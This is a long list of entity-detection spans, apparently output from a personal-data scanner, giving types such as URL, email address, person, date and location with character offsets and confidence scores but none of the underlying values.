URL, start: 13078, end: 13091, score: 0.5, type: URL, start: 13218, end: 13231, score: 0.5, type: URL, start: 13239, end: 13244, score: 0.5, type: URL, start: 13272, end: 13291, score: 0.5, type: URL, start: 13443, end: 13450, score: 0.5, type: URL, start: 13474, end: 13481, score: 0.5, type: URL, start: 13489, end: 13503, score: 0.5, type: URL, start: 13523, end: 13538, score: 0.5, type: URL, start: 13573, end: 13581, score: 0.5, type: URL, start: 13603, end: 13614, score: 0.5, type: URL, start: 13638, end: 13645, score: 0.5, type: URL, start: 13649, end: 13663, score: 0.5, type: URL, start: 13679, end: 13690, score: 0.5, type: URL, start: 13927, end: 13940, score: 0.5, type: URL, start: 13948, end: 13953, score: 0.5, type: URL, start: 13981, end: 14004, score: 0.5, type: URL, start: 14189, end: 14196, score: 0.5, type: URL, start: 14224, end: 14231, score: 0.5, type: URL, start: 14240, end: 14258, score: 0.5, type: URL, start: 14283, end: 14299, score: 0.5, type: URL, start: 14580, end: 14593, score: 0.5, type: URL, start: 14601, end: 14606, score: 0.5, type: URL, start: 14634, end: 14666, score: 0.5, type: URL, start: 14878, end: 14885, score: 0.5, type: URL, start: 14917, end: 14924, score: 0.5, type: URL, start: 14960, end: 14975, score: 0.5, type: URL, start: 15007, end: 15022, score: 0.5, type: URL, start: 15815, end: 15828, score: 0.5, type: URL, start: 15836, end: 15841, score: 0.5, type: URL, start: 17671, end: 17684, score: 0.5, type: URL, start: 17692, end: 17697, score: 0.5, type: URL, start: 18293, end: 18300, score: 0.5, type: URL, start: 18336, end: 18343, score: 0.5, type: URL, start: 18383, end: 18390, score: 0.5, type: URL, start: 18443, end: 18450, score: 0.5, type: URL, start: 18498, end: 18505, score: 0.5, type: URL, start: 18549, end: 18556, score: 0.5, type: URL, start: 18597, end: 18604, score: 0.5, type: URL, start: 18700, end: 18707, score: 0.5, type: URL, start: 18754, end: 18761, score: 0.5, type: URL, start: 18801, end: 18808, score: 0.5, type: URL, start: 18843, end: 18850, score: 0.5, type: URL, start: 19011, end: 19018, score: 0.5, type: URL, start: 19223, end: 19230, score: 0.5, type: URL, start: 19498, end: 19505, score: 0.5, type: URL, start: 19595, end: 19602, score: 0.5, type: URL, start: 19705, end: 19712, score: 0.5, type: URL, start: 19810, end: 19817, score: 0.5, type: URL, start: 19911, end: 19918, score: 0.5, type: URL, start: 20009, end: 20016, score: 0.5, type: URL, start: 20212, end: 20219, score: 0.5, type: URL, start: 20316, end: 20323, score: 0.5, type: URL, start: 20413, end: 20420, score: 0.5, type: URL, start: 20505, end: 20512, score: 0.5, type: URL, start: 20807, end: 20820, score: 0.5, type: URL, start: 20937, end: 20964, score: 0.5, type: URL, start: 21321, end: 21328, score: 0.5, type: URL, start: 21388, end: 21395, score: 0.5, type: URL, start: 21624, end: 21637, score: 0.5, type: URL, start: 21750, end: 21768, score: 0.5, type: URL, start: 22094, end: 22101, score: 0.5, type: URL, start: 22124, end: 22131, score: 0.5, type: URL, start: 22291, end: 22304, score: 0.5, type: URL, start: 22413, end: 22427, score: 0.5, type: URL, start: 22677, end: 22690, score: 0.5, type: URL, start: 22698, end: 22703, score: 0.5, type: URL, start: 22731, end: 22758, score: 0.5, type: URL, start: 22943, end: 22950, score: 0.5, type: URL, start: 22978, end: 22985, score: 0.5, type: URL, start: 22994, end: 23016, score: 0.5, type: URL, start: 23041, end: 23057, score: 0.5, type: URL, start: 23338, end: 23351, score: 0.5, type: URL, start: 23359, end: 23364, score: 0.5, type: URL, start: 23392, end: 23428, score: 0.5, type: URL, start: 23640, end: 23647, score: 0.5, type: URL, start: 23679, end: 23686, score: 0.5, type: URL, start: 23722, end: 23737, score: 0.5, type: URL, start: 23769, end: 23784, score: 0.5, type: URL, start: 24577, end: 24590, score: 0.5, type: URL, start: 24598, end: 24603, score: 0.5, type: URL, start: 26433, end: 26446, score: 0.5, type: URL, start: 26454, end: 26459, score: 0.5, type: URL, start: 27055, end: 27062, score: 0.5, type: URL, start: 27098, end: 27105, score: 0.5, type: URL, start: 27145, end: 27152, score: 0.5, type: URL, start: 27205, end: 27212, score: 0.5, type: URL, start: 27260, end: 27267, score: 0.5, type: URL, start: 27311, end: 27318, score: 0.5, type: URL, start: 27359, end: 27366, score: 0.5, type: URL, start: 27462, end: 27469, score: 0.5, type: URL, start: 27516, end: 27523, score: 0.5, type: URL, start: 27563, end: 27570, score: 0.5, type: URL, start: 27605, end: 27612, score: 0.5, type: URL, start: 27773, end: 27780, score: 0.5, type: URL, start: 27985, end: 27992, score: 0.5, type: URL, start: 28260, end: 28267, score: 0.5, type: URL, start: 28357, end: 28364, score: 0.5, type: URL, start: 28467, end: 28474, score: 0.5, type: URL, start: 28572, end: 28579, score: 0.5, type: URL, start: 28673, end: 28680, score: 0.5, type: URL, start: 28771, end: 28778, score: 0.5, type: URL, start: 28974, end: 28981, score: 0.5, type: URL, start: 29078, end: 29085, score: 0.5, type: URL, start: 29175, end: 29182, score: 0.5, type: URL, start: 29267, end: 29274, score: 0.5, type: URL, start: 29569, end: 29582, score: 0.5, type: URL, start: 29699, end: 29730, score: 0.5, type: URL, start: 30087, end: 30094, score: 0.5, type: URL, start: 30154, end: 30161, score: 0.5, type: URL, start: 30390, end: 30403, score: 0.5, type: URL, start: 30516, end: 30538, score: 0.5, type: URL, start: 30864, end: 30871, score: 0.5, type: URL, start: 30894, end: 30901, score: 0.5, type: URL, start: 31061, end: 31074, score: 0.5, type: URL, start: 31183, end: 31197, score: 0.5, type: URL, start: 31443, end: 31456, score: 0.5, type: URL, start: 31464, end: 31469, score: 0.5, type: URL, start: 31497, end: 31520, score: 0.5, type: URL, start: 31705, end: 31712, score: 0.5, type: URL, start: 31740, end: 31747, score: 0.5, type: URL, start: 31756, end: 31774, score: 0.5, type: URL, start: 31799, end: 31815, score: 0.5, type: URL, start: 32096, end: 32109, score: 0.5, type: URL, start: 32117, end: 32122, score: 0.5, type: URL, start: 32150, end: 32182, score: 0.5, type: URL, start: 32394, end: 32401, score: 0.5, type: URL, start: 32433, end: 32440, score: 0.5, type: URL, start: 32476, end: 32491, score: 0.5, type: URL, start: 32523, end: 32538, score: 0.5, type: URL, start: 33331, end: 33344, score: 0.5, type: URL, start: 33352, end: 33357, score: 0.5, type: URL, start: 35187, end: 35200, score: 0.5, type: URL, start: 35208, end: 35213, score: 0.5, type: URL, start: 35809, end: 35816, score: 0.5, type: URL, start: 35852, end: 35859, score: 0.5, type: URL, start: 35899, end: 35906, score: 0.5, type: URL, start: 35959, end: 35966, score: 0.5, type: URL, start: 36014, end: 36021, score: 0.5, type: URL, start: 36065, end: 36072, score: 0.5, type: URL, start: 36113, end: 36120, score: 0.5, type: URL, start: 36216, end: 36223, score: 0.5, type: URL, start: 36270, end: 36277, score: 0.5, type: URL, start: 36317, end: 36324, score: 0.5, type: URL, start: 36359, end: 36366, score: 0.5, type: URL, start: 36527, end: 36534, score: 0.5, type: URL, start: 36739, end: 36746, score: 0.5, type: URL, start: 37014, end: 37021, score: 0.5, type: URL, start: 37111, end: 37118, score: 0.5, type: URL, start: 37221, end: 37228, score: 0.5, type: URL, start: 37326, end: 37333, score: 0.5, type: URL, start: 37427, end: 37434, score: 0.5, type: URL, start: 37525, end: 37532, score: 0.5, type: URL, start: 37728, end: 37735, score: 0.5, type: URL, start: 37832, end: 37839, score: 0.5, type: URL, start: 37929, end: 37936, score: 0.5, type: URL, start: 38021, end: 38028, score: 0.5, type: URL, start: 38323, end: 38336, score: 0.5, type: URL, start: 38453, end: 38480, score: 0.5, type: URL, start: 38837, end: 38844, score: 0.5, type: URL, start: 38904, end: 38911, score: 0.5, type: URL, start: 39140, end: 39153, score: 0.5, type: URL, start: 39266, end: 39284, score: 0.5, type: URL, start: 39610, end: 39617, score: 0.5, type: URL, start: 39640, end: 39647, score: 0.5, type: URL, start: 39807, end: 39820, score: 0.5, type: URL, start: 39929, end: 39937, score: 0.5, type: URL, start: 40232, end: 40239, score: 0.5, type: URL, start: 40261, end: 40268, score: 0.5, type: URL, start: 40422, end: 40429, score: 0.5, type: URL, start: 40447, end: 40454, score: 0.5, type: URL, start: 40589, end: 40602, score: 0.5, type: URL, start: 40707, end: 40715, score: 0.5, type: URL, start: 41010, end: 41017, score: 0.5, type: URL, start: 41037, end: 41044, score: 0.5, type: URL, start: 41161, end: 41174, score: 0.5, type: EMAIL_ADDRESS, start: 31, end: 46, score: 1.0, type: EMAIL_ADDRESS, start: 64, end: 79, score: 1.0, type: EMAIL_ADDRESS, start: 1107, end: 1122, score: 1.0, type: PERSON, start: 17, end: 30, score: 0.85, type: DATE_TIME, start: 97, end: 112, score: 0.85, type: DATE_TIME, start: 144, end: 148, score: 0.85, type: PERSON, start: 149, end: 162, score: 0.85, type: URL, start: 936, end: 944, score: 0.85, type: PERSON, start: 1164, end: 1176, score: 0.85, type: URL, start: 37, end: 46, score: 0.5, type: URL, start: 70, end: 79, score: 0.5, type: URL, start: 210, end: 219, score: 0.5, type: URL, start: 338, end: 346, score: 0.5, type: URL, start: 439, end: 449, score: 0.5, type: URL, start: 545, end: 555, score: 0.5, type: URL, start: 648, end: 657, score: 0.5, type: URL, start: 769, end: 778, score: 0.5, type: URL, start: 872, end: 881, score: 0.5, type: URL, start: 961, end: 969, score: 0.5, type: URL, start: 1092, end: 1099, score: 0.5, type: URL, start: 1113, end: 1122, score: 0.5, type: URL, start: 1155, end: 1166, score: 0.5, type: URL, start: 1254, end: 1261, score: 0.5, type: URL, start: 1341, end: 1348, score: 0.5, type: EMAIL_ADDRESS, start: 142, end: 157, score: 1.0, type: DATE_TIME, start: 176, end: 180, score: 0.85, type: PERSON, start: 1724, end: 1736, score: 0.85, type: PERSON, start: 1860, end: 1885, score: 0.85, type: URL, start: 198, end: 227, score: 0.6, type: URL, start: 877, end: 905, score: 0.6, type: URL, start: 148, end: 157, score: 0.5, type: URL, start: 1127, end: 1139, score: 0.5, type: URL, start: 1227, end: 1236, score: 0.5, type: URL, start: 1307, end: 1316, score: 0.5, type: URL, start: 1561, end: 1570, score: 0.5, type: URL, start: 2168, end: 2177, score: 0.5, type: URL, start: 2354, end: 2363, score: 0.5, type: EMAIL_ADDRESS, start: 128, end: 143, score: 1.0, type: PERSON, start: 117, end: 127, score: 0.85, type: PERSON, start: 1392, end: 1427, score: 0.85, type: PERSON, start: 1571, end: 1606, score: 0.85, type: URL, start: 743, end: 772, score: 0.6, type: URL, start: 134, end: 143, score: 0.5, type: URL, start: 796, end: 821, score: 0.5, type: URL, start: 902, end: 912, score: 0.5, type: URL, start: 952, end: 962, score: 0.5, type: URL, start: 1026, end: 1034, score: 0.5, type: URL, start: 1069, end: 1077, score: 0.5, type: URL, start: 1226, end: 1239, score: 0.5, type: URL, start: 1288, end: 1297, score: 0.5, type: URL, start: 1353, end: 1366, score: 0.5, type: URL, start: 24119, end: 24179, score: 0.95, type: DATE_TIME, start: 51, end: 60, score: 0.85, type: LOCATION, start: 824, end: 833, score: 0.85, type: LOCATION, start: 835, end: 842, score: 0.85, type: URL, start: 965, end: 977, score: 0.85, type: PERSON, start: 1115, end: 1123, score: 0.85, type: PERSON, start: 1198, end: 1206, score: 0.85, type: PERSON, start: 1289, end: 1305, score: 0.85, type: URL, start: 1799, end: 1809, score: 0.85, type: URL, start: 1827, end: 1834, score: 0.85, type: URL, start: 1919, end: 1928, score: 0.85, type: URL, start: 2114, end: 2121, score: 0.85, type: URL, start: 2170, end: 2177, score: 0.85, type: PERSON, start: 2292, end: 2301, score: 0.85, type: URL, start: 2390, end: 2397, score: 0.85, type: URL, start: 2587, end: 2591, score: 0.85, type: PERSON, start: 3454, end: 3465, score: 0.85, type: PERSON, start: 3832, end: 3841, score: 0.85, type: PERSON, start: 4311, end: 4318, score: 0.85, type: PERSON, start: 4540, end: 4549, score: 0.85, type: LOCATION, start: 4669, end: 4691, score: 0.85, type: URL, start: 4738, end: 4745, score: 0.85, type: URL, start: 5064, end: 5071, score: 0.85, type: URL, start: 5120, end: 5127, score: 0.85, type: URL, start: 5145, end: 5159, score: 0.85, type: URL, start: 5428, end: 5438, score: 0.85, type: URL, start: 5455, end: 5462, score: 0.85, type: URL, start: 5645, end: 5649, score: 0.85, type: URL, start: 5729, end: 5739, score: 0.85, type: URL, start: 5756, end: 5763, score: 0.85, type: URL, start: 6387, end: 6397, score: 0.85, type: URL, start: 6414, end: 6421, score: 0.85, type: URL, start: 6942, end: 6946, score: 0.85, type: URL, start: 7036, end: 7051, score: 0.85, type: URL, start: 7087, end: 7094, score: 0.85, type: URL, start: 7134, end: 7141, score: 0.85, type: URL, start: 7358, end: 7362, score: 0.85, type: URL, start: 7452, end: 7467, score: 0.85, type: URL, start: 7503, end: 7510, score: 0.85, type: URL, start: 7550, end: 7557, score: 0.85, type: URL, start: 7792, end: 7796, score: 0.85, type: URL, start: 7886, end: 7901, score: 0.85, type: URL, start: 7937, end: 7944, score: 0.85, type: URL, start: 7984, end: 7991, score: 0.85, type: URL, start: 8231, end: 8235, score: 0.85, type: URL, start: 8325, end: 8340, score: 0.85, type: URL, start: 8376, end: 8383, score: 0.85, type: URL, start: 8423, end: 8430, score: 0.85, type: URL, start: 8463, end: 8474, score: 0.85, type: URL, start: 8666, end: 8670, score: 0.85, type: URL, start: 9516, end: 9531, score: 0.85, type: URL, start: 9564, end: 9571, score: 0.85, type: URL, start: 9621, end: 9628, score: 0.85, type: URL, start: 10047, end: 10062, score: 0.85, type: URL, start: 10095, end: 10102, score: 0.85, type: URL, start: 10152, end: 10159, score: 0.85, type: URL, start: 10551, end: 10561, score: 0.85, type: URL, start: 10579, end: 10586, score: 0.85, type: URL, start: 10604, end: 10613, score: 0.85, type: URL, start: 10674, end: 10684, score: 0.85, type: URL, start: 10809, end: 10820, score: 0.85, type: URL, start: 10893, end: 10903, score: 0.85, type: URL, start: 10921, end: 10928, score: 0.85, type: URL, start: 10998, end: 11008, score: 0.85, type: URL, start: 11026, end: 11033, score: 0.85, type: URL, start: 11051, end: 11060, score: 0.85, type: PERSON, start: 11109, end: 11116, score: 0.85, type: URL, start: 11159, end: 11166, score: 0.85, type: URL, start: 11231, end: 11241, score: 0.85, type: URL, start: 11400, end: 11404, score: 0.85, type: URL, start: 11480, end: 11490, score: 0.85, type: URL, start: 11507, end: 11514, score: 0.85, type: URL, start: 12112, end: 12122, score: 0.85, type: URL, start: 12151, end: 12156, score: 0.85, type: URL, start: 12381, end: 12391, score: 0.85, type: URL, start: 12408, end: 12415, score: 0.85, type: URL, start: 12866, end: 12870, score: 0.85, type: PERSON, start: 12921, end: 12926, score: 0.85, type: URL, start: 13056, end: 13061, score: 0.85, type: LOCATION, start: 13395, end: 13400, score: 0.85, type: LOCATION, start: 14172, end: 14177, score: 0.85, type: PERSON, start: 14462, end: 14469, score: 0.85, type: LOCATION, start: 15033, end: 15038, score: 0.85, type: PERSON, start: 15445, end: 15452, score: 0.85, type: LOCATION, start: 17097, end: 17102, score: 0.85, type: PERSON, start: 18820, end: 18824, score: 0.85, type: PERSON, start: 20198, end: 20205, score: 0.85, type: URL, start: 21663, end: 21673, score: 0.85, type: LOCATION, start: 21710, end: 21733, score: 0.85, type: URL, start: 21710, end: 21717, score: 0.85, type: URL, start: 21750, end: 21760, score: 0.85, type: URL, start: 21783, end: 21790, score: 0.85, type: URL, start: 21799, end: 21809, score: 0.85, type: URL, start: 22961, end: 22965, score: 0.85, type: URL, start: 23511, end: 23518, score: 0.85, type: URL, start: 23592, end: 23597, score: 0.85, type: URL, start: 23702, end: 23706, score: 0.85, type: URL, start: 23760, end: 23767, score: 0.85, type: PERSON, start: 23789, end: 23794, score: 0.85, type: URL, start: 23821, end: 23826, score: 0.85, type: LOCATION, start: 23974, end: 24004, score: 0.85, type: URL, start: 24227, end: 24234, score: 0.85, type: PERSON, start: 24256, end: 24261, score: 0.85, type: URL, start: 24275, end: 24282, score: 0.85, type: NRP, start: 24320, end: 24327, score: 0.85, type: LOCATION, start: 24408, end: 24436, score: 0.85, type: NRP, start: 24541, end: 24548, score: 0.85, type: LOCATION, start: 24608, end: 24636, score: 0.85, type: URL, start: 24836, end: 24846, score: 0.85, type: URL, start: 24864, end: 24871, score: 0.85, type: URL, start: 24893, end: 24902, score: 0.85, type: PERSON, start: 24951, end: 24958, score: 0.85, type: URL, start: 25225, end: 25229, score: 0.85, type: URL, start: 25293, end: 25300, score: 0.85, type: URL, start: 25467, end: 25471, score: 0.85, type: URL, start: 25742, end: 25746, score: 0.85, type: DATE_TIME, start: 26903, end: 26945, score: 0.85, type: URL, start: 27485, end: 27493, score: 0.85, type: URL, start: 27510, end: 27517, score: 0.85, type: URL, start: 27668, end: 27672, score: 0.85, type: URL, start: 27701, end: 27706, score: 0.85, type: URL, start: 27870, end: 27878, score: 0.85, type: URL, start: 27903, end: 27910, score: 0.85, type: URL, start: 28157, end: 28164, score: 0.85, type: URL, start: 28315, end: 28319, score: 0.85, type: URL, start: 28340, end: 28347, score: 0.85, type: URL, start: 28746, end: 28753, score: 0.85, type: URL, start: 28933, end: 28937, score: 0.85, type: URL, start: 28958, end: 28965, score: 0.85, type: URL, start: 29095, end: 29100, score: 0.85, type: URL, start: 29137, end: 29141, score: 0.85, type: URL, start: 29162, end: 29169, score: 0.85, type: URL, start: 29343, end: 29347, score: 0.85, type: URL, start: 29368, end: 29375, score: 0.85, type: URL, start: 29542, end: 29546, score: 0.85, type: URL, start: 29567, end: 29574, score: 0.85, type: URL, start: 29822, end: 29826, score: 0.85, type: URL, start: 29899, end: 29904, score: 0.85, type: URL, start: 30026, end: 30030, score: 0.85, type: URL, start: 30164, end: 30169, score: 0.85, type: PERSON, start: 30182, end: 30236, score: 0.85, type: URL, start: 30574, end: 30584, score: 0.85, type: URL, start: 30986, end: 30990, score: 0.85, type: URL, start: 31617, end: 31621, score: 0.85, type: URL, start: 31638, end: 31651, score: 0.85, type: URL, start: 31773, end: 31778, score: 0.85, type: URL, start: 31826, end: 31831, score: 0.85, type: URL, start: 31877, end: 31881, score: 0.85, type: URL, start: 31964, end: 31980, score: 0.85, type: URL, start: 32102, end: 32107, score: 0.85, type: URL, start: 32163, end: 32168, score: 0.85, type: URL, start: 32214, end: 32218, score: 0.85, type: URL, start: 32236, end: 32246, score: 0.85, type: URL, start: 32368, end: 32373, score: 0.85, type: URL, start: 32432, end: 32437, score: 0.85, type: URL, start: 32483, end: 32487, score: 0.85, type: URL, start: 32505, end: 32516, score: 0.85, type: URL, start: 32638, end: 32643, score: 0.85, type: LOCATION, start: 32665, end: 32673, score: 0.85, type: URL, start: 32692, end: 32697, score: 0.85, type: URL, start: 32743, end: 32747, score: 0.85, type: URL, start: 32765, end: 32776, score: 0.85, type: URL, start: 32898, end: 32903, score: 0.85, type: URL, start: 32956, end: 32961, score: 0.85, type: URL, start: 33007, end: 33011, score: 0.85, type: URL, start: 33064, end: 33071, score: 0.85, type: URL, start: 33130, end: 33136, score: 0.85, type: URL, start: 33203, end: 33213, score: 0.85, type: URL, start: 691, end: 719, score: 0.6, type: IP_ADDRESS, start: 27845, end: 27856, score: 0.6, type: IP_ADDRESS, start: 28099, end: 28111, score: 0.6, type: URL, start: 890, end: 905, score: 0.5, type: URL, start: 1069, end: 1077, score: 0.5, type: URL, start: 1152, end: 1160, score: 0.5, type: URL, start: 1235, end: 1250, score: 0.5, type: URL, start: 1955, end: 1962, score: 0.5, type: URL, start: 1985, end: 1992, score: 0.5, type: URL, start: 2001, end: 2015, score: 0.5, type: URL, start: 2030, end: 2037, score: 0.5, type: URL, start: 2045, end: 2056, score: 0.5, type: URL, start: 2083, end: 2090, score: 0.5, type: URL, start: 2292, end: 2299, score: 0.5, type: URL, start: 2668, end: 2676, score: 0.5, type: URL, start: 2701, end: 2709, score: 0.5, type: URL, start: 2807, end: 2818, score: 0.5, type: URL, start: 2831, end: 2842, score: 0.5, type: URL, start: 2929, end: 2934, score: 0.5, type: URL, start: 2999, end: 3004, score: 0.5, type: URL, start: 3094, end: 3099, score: 0.5, type: URL, start: 3160, end: 3165, score: 0.5, type: URL, start: 3271, end: 3279, score: 0.5, type: URL, start: 3304, end: 3312, score: 0.5, type: URL, start: 3417, end: 3424, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3528, end: 3533, score: 0.5, type: URL, start: 3581, end: 3585, score: 0.5, type: URL, start: 3653, end: 3660, score: 0.5, type: URL, start: 3739, end: 3746, score: 0.5, type: URL, start: 4008, end: 4015, score: 0.5, type: URL, start: 4027, end: 4034, score: 0.5, type: URL, start: 4099, end: 4106, score: 0.5, type: URL, start: 4150, end: 4157, score: 0.5, type: URL, start: 4171, end: 4178, score: 0.5, type: URL, start: 4191, end: 4198, score: 0.5, type: URL, start: 4221, end: 4228, score: 0.5, type: URL, start: 4240, end: 4247, score: 0.5, type: URL, start: 4293, end: 4300, score: 0.5, type: URL, start: 4364, end: 4371, score: 0.5, type: URL, start: 4385, end: 4392, score: 0.5, type: URL, start: 4405, end: 4412, score: 0.5, type: URL, start: 4471, end: 4478, score: 0.5, type: URL, start: 5033, end: 5040, score: 0.5, type: URL, start: 5164, end: 5171, score: 0.5, type: URL, start: 5662, end: 5666, score: 0.5, type: URL, start: 6061, end: 6072, score: 0.5, type: URL, start: 6089, end: 6100, score: 0.5, type: URL, start: 6128, end: 6133, score: 0.5, type: URL, start: 6262, end: 6267, score: 0.5, type: URL, start: 6324, end: 6328, score: 0.5, type: URL, start: 6646, end: 6657, score: 0.5, type: URL, start: 6678, end: 6689, score: 0.5, type: URL, start: 6782, end: 6787, score: 0.5, type: URL, start: 6892, end: 6897, score: 0.5, type: URL, start: 7179, end: 7184, score: 0.5, type: URL, start: 7315, end: 7320, score: 0.5, type: URL, start: 7632, end: 7637, score: 0.5, type: URL, start: 7749, end: 7754, score: 0.5, type: URL, start: 8065, end: 8070, score: 0.5, type: URL, start: 8188, end: 8193, score: 0.5, type: URL, start: 8479, end: 8486, score: 0.5, type: URL, start: 8517, end: 8522, score: 0.5, type: URL, start: 8619, end: 8624, score: 0.5, type: URL, start: 8963, end: 8968, score: 0.5, type: URL, start: 9084, end: 9089, score: 0.5, type: URL, start: 9191, end: 9196, score: 0.5, type: URL, start: 9246, end: 9250, score: 0.5, type: URL, start: 9343, end: 9348, score: 0.5, type: URL, start: 9697, end: 9702, score: 0.5, type: URL, start: 9810, end: 9815, score: 0.5, type: URL, start: 9864, end: 9868, score: 0.5, type: URL, start: 10642, end: 10649, score: 0.5, type: URL, start: 11089, end: 11096, score: 0.5, type: URL, start: 11180, end: 11187, score: 0.5, type: URL, start: 11200, end: 11207, score: 0.5, type: URL, start: 11417, end: 11421, score: 0.5, type: URL, start: 11806, end: 11817, score: 0.5, type: URL, start: 11830, end: 11841, score: 0.5, type: URL, start: 11865, end: 11870, score: 0.5, type: URL, start: 11944, end: 11949, score: 0.5, type: URL, start: 11989, end: 11993, score: 0.5, type: URL, start: 12256, end: 12261, score: 0.5, type: URL, start: 12318, end: 12322, score: 0.5, type: URL, start: 12648, end: 12659, score: 0.5, type: URL, start: 12680, end: 12691, score: 0.5, type: URL, start: 12710, end: 12717, score: 0.5, type: URL, start: 12726, end: 12734, score: 0.5, type: URL, start: 12758, end: 12763, score: 0.5, type: URL, start: 12815, end: 12820, score: 0.5, type: URL, start: 13354, end: 13359, score: 0.5, type: URL, start: 13411, end: 13415, score: 0.5, type: URL, start: 13706, end: 13711, score: 0.5, type: URL, start: 14131, end: 14136, score: 0.5, type: URL, start: 14200, end: 14204, score: 0.5, type: URL, start: 14514, end: 14519, score: 0.5, type: URL, start: 14992, end: 14997, score: 0.5, type: URL, start: 15066, end: 15070, score: 0.5, type: URL, start: 15497, end: 15502, score: 0.5, type: URL, start: 15743, end: 15748, score: 0.5, type: URL, start: 15791, end: 15795, score: 0.5, type: URL, start: 16039, end: 16044, score: 0.5, type: URL, start: 16338, end: 16343, score: 0.5, type: URL, start: 16391, end: 16395, score: 0.5, type: URL, start: 16671, end: 16676, score: 0.5, type: URL, start: 17048, end: 17053, score: 0.5, type: URL, start: 17113, end: 17117, score: 0.5, type: URL, start: 17491, end: 17496, score: 0.5, type: URL, start: 17582, end: 17587, score: 0.5, type: URL, start: 17622, end: 17626, score: 0.5, type: URL, start: 17720, end: 17725, score: 0.5, type: URL, start: 17811, end: 17816, score: 0.5, type: URL, start: 17851, end: 17855, score: 0.5, type: URL, start: 17942, end: 17947, score: 0.5, type: URL, start: 18033, end: 18038, score: 0.5, type: URL, start: 18073, end: 18077, score: 0.5, type: URL, start: 18167, end: 18172, score: 0.5, type: URL, start: 18258, end: 18263, score: 0.5, type: URL, start: 18298, end: 18302, score: 0.5, type: URL, start: 18394, end: 18399, score: 0.5, type: URL, start: 18485, end: 18490, score: 0.5, type: URL, start: 18525, end: 18529, score: 0.5, type: URL, start: 18619, end: 18624, score: 0.5, type: URL, start: 18710, end: 18715, score: 0.5, type: URL, start: 18750, end: 18754, score: 0.5, type: URL, start: 18843, end: 18848, score: 0.5, type: URL, start: 18934, end: 18939, score: 0.5, type: URL, start: 18974, end: 18978, score: 0.5, type: URL, start: 19074, end: 19079, score: 0.5, type: URL, start: 19165, end: 19170, score: 0.5, type: URL, start: 19205, end: 19209, score: 0.5, type: URL, start: 19308, end: 19313, score: 0.5, type: URL, start: 19399, end: 19404, score: 0.5, type: URL, start: 19439, end: 19443, score: 0.5, type: URL, start: 19532, end: 19537, score: 0.5, type: URL, start: 19623, end: 19628, score: 0.5, type: URL, start: 19663, end: 19667, score: 0.5, type: URL, start: 19763, end: 19768, score: 0.5, type: URL, start: 19854, end: 19859, score: 0.5, type: URL, start: 19894, end: 19898, score: 0.5, type: URL, start: 19997, end: 20002, score: 0.5, type: URL, start: 20088, end: 20093, score: 0.5, type: URL, start: 20128, end: 20132, score: 0.5, type: URL, start: 20224, end: 20229, score: 0.5, type: URL, start: 20333, end: 20338, score: 0.5, type: URL, start: 20373, end: 20377, score: 0.5, type: URL, start: 20465, end: 20470, score: 0.5, type: URL, start: 20541, end: 20546, score: 0.5, type: URL, start: 20581, end: 20585, score: 0.5, type: URL, start: 20676, end: 20681, score: 0.5, type: URL, start: 20752, end: 20757, score: 0.5, type: URL, start: 20792, end: 20796, score: 0.5, type: URL, start: 20892, end: 20897, score: 0.5, type: URL, start: 21264, end: 21269, score: 0.5, type: URL, start: 21325, end: 21329, score: 0.5, type: URL, start: 21877, end: 21884, score: 0.5, type: URL, start: 21893, end: 21905, score: 0.5, type: URL, start: 21966, end: 21980, score: 0.5, type: URL, start: 21985, end: 21992, score: 0.5, type: URL, start: 22030, end: 22038, score: 0.5, type: URL, start: 22063, end: 22071, score: 0.5, type: URL, start: 22118, end: 22125, score: 0.5, type: URL, start: 22161, end: 22168, score: 0.5, type: URL, start: 22177, end: 22187, score: 0.5, type: URL, start: 22222, end: 22230, score: 0.5, type: URL, start: 22255, end: 22263, score: 0.5, type: URL, start: 22310, end: 22317, score: 0.5, type: URL, start: 22353, end: 22360, score: 0.5, type: URL, start: 22369, end: 22377, score: 0.5, type: URL, start: 22412, end: 22420, score: 0.5, type: URL, start: 22445, end: 22453, score: 0.5, type: URL, start: 22499, end: 22506, score: 0.5, type: URL, start: 22541, end: 22548, score: 0.5, type: URL, start: 22557, end: 22570, score: 0.5, type: URL, start: 22605, end: 22613, score: 0.5, type: URL, start: 22638, end: 22646, score: 0.5, type: URL, start: 22692, end: 22699, score: 0.5, type: URL, start: 22736, end: 22743, score: 0.5, type: URL, start: 22752, end: 22761, score: 0.5, type: URL, start: 22978, end: 22982, score: 0.5, type: URL, start: 23392, end: 23403, score: 0.5, type: URL, start: 23465, end: 23476, score: 0.5, type: URL, start: 23647, end: 23652, score: 0.5, type: URL, start: 23883, end: 23888, score: 0.5, type: URL, start: 23938, end: 23942, score: 0.5, type: URL, start: 23974, end: 23979, score: 0.5, type: URL, start: 24022, end: 24027, score: 0.5, type: URL, start: 24075, end: 24079, score: 0.5, type: URL, start: 24291, end: 24304, score: 0.5, type: URL, start: 24408, end: 24413, score: 0.5, type: URL, start: 24471, end: 24476, score: 0.5, type: URL, start: 24514, end: 24518, score: 0.5, type: URL, start: 24608, end: 24613, score: 0.5, type: URL, start: 24671, end: 24676, score: 0.5, type: URL, start: 24714, end: 24718, score: 0.5, type: URL, start: 24766, end: 24773, score: 0.5, type: URL, start: 24931, end: 24938, score: 0.5, type: URL, start: 25038, end: 25045, score: 0.5, type: URL, start: 25054, end: 25065, score: 0.5, type: URL, start: 25090, end: 25095, score: 0.5, type: URL, start: 25183, end: 25188, score: 0.5, type: URL, start: 25309, end: 25317, score: 0.5, type: URL, start: 25342, end: 25347, score: 0.5, type: URL, start: 25425, end: 25430, score: 0.5, type: URL, start: 25759, end: 25763, score: 0.5, type: URL, start: 26156, end: 26167, score: 0.5, type: URL, start: 26180, end: 26191, score: 0.5, type: URL, start: 26229, end: 26234, score: 0.5, type: URL, start: 26528, end: 26533, score: 0.5, type: URL, start: 26581, end: 26585, score: 0.5, type: URL, start: 26903, end: 26908, score: 0.5, type: URL, start: 26964, end: 26969, score: 0.5, type: URL, start: 27005, end: 27009, score: 0.5, type: URL, start: 27051, end: 27058, score: 0.5, type: URL, start: 27067, end: 27077, score: 0.5, type: URL, start: 27135, end: 27140, score: 0.5, type: URL, start: 27215, end: 27220, score: 0.5, type: URL, start: 27270, end: 27274, score: 0.5, type: URL, start: 27303, end: 27308, score: 0.5, type: URL, start: 27351, end: 27356, score: 0.5, type: URL, start: 27400, end: 27404, score: 0.5, type: URL, start: 27526, end: 27539, score: 0.5, type: URL, start: 27563, end: 27568, score: 0.5, type: URL, start: 27617, end: 27622, score: 0.5, type: URL, start: 27749, end: 27754, score: 0.5, type: URL, start: 27798, end: 27802, score: 0.5, type: URL, start: 27919, 